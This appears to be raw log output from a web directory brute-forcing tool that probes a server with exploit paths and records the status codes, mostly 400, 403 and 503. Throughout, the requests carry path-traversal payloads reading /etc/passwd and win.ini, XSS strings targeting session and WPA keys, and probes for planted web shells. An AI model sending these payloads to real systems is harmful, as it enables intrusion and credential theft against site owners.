//theme\179_simplebar_basic\view.php (Status: 400) [Size: 435]
//theme\179_simplebar_pds_list\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_gallery\view.php (Status: 400) [Size: 435]
//theme\179_simplebar_notice\view.php (Status: 400) [Size: 435]
//theme\179_simplebar_gallery\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_board_basic_with_grcode\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_board_expand\view.php (Status: 400) [Size: 435]
//theme\179_simplebar_gallery_list_pds\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_board_swfupload\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_minishop_expand\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_board_basic\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_gallery_list_pds\view.php (Status: 400) [Size: 435]
//theme\179_squarebox_gallery_list\view.php (Status: 400) [Size: 435]
//var/sh.php\r        (Status: 400) [Size: 435]
//var/sh.php\n\r      (Status: 400) [Size: 435]
//versionpagerefresh/natterchat112.mdb (Status: 503) [Size: 0]
//vhosts/[username]/[domain]/httpdocs/shell.php (Status: 400) [Size: 435]
//webcalendar/[filename].php (Status: 400) [Size: 435]
//webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini (Status: 403) [Size: 4514]
//websitedirectory.php\n (Status: 400) [Size: 435]
//wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);// (Status: 403) [Size: 4514]
//wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);// (Status: 403) [Size: 4514]
//wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);// (Status: 403) [Size: 4514]
//wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E (Status: 403) [Size: 4514]
//wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd (Status: 403) [Size: 4514]
//wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd (Status: 403) [Size: 4514]
//wp-content/plugins/uploads/[YYYY]/[MM]/shell.php (Status: 400) [Size: 435]
//wp-content/uploads/[year]/[month]/up.php (Status: 400) [Size: 435]
//wp-content/uploads/[years]/[month]/your_shell.php (Status: 400) [Size: 435]
//wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc (Status: 403) [Size: 4514]
//xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini (Status: 403) [Size: 4514]
//xyz/../../ThinVnc.ini (Status: 400) [Size: 155]
//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini (Status: 403) [Size: 4514]
//index.php?age=50[NoSQLi] (Status: 400) [Size: 435]
//version             (Status: 503) [Size: 0]
//errorInSignUp.htm   (Status: 503) [Size: 0]
//checkout/cart/add/uenc/\/product/1 (Status: 400) [Size: 435]
//../agc/bp.pl        (Status: 400) [Size: 155]
//spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log (Status: 403) [Size: 4514]
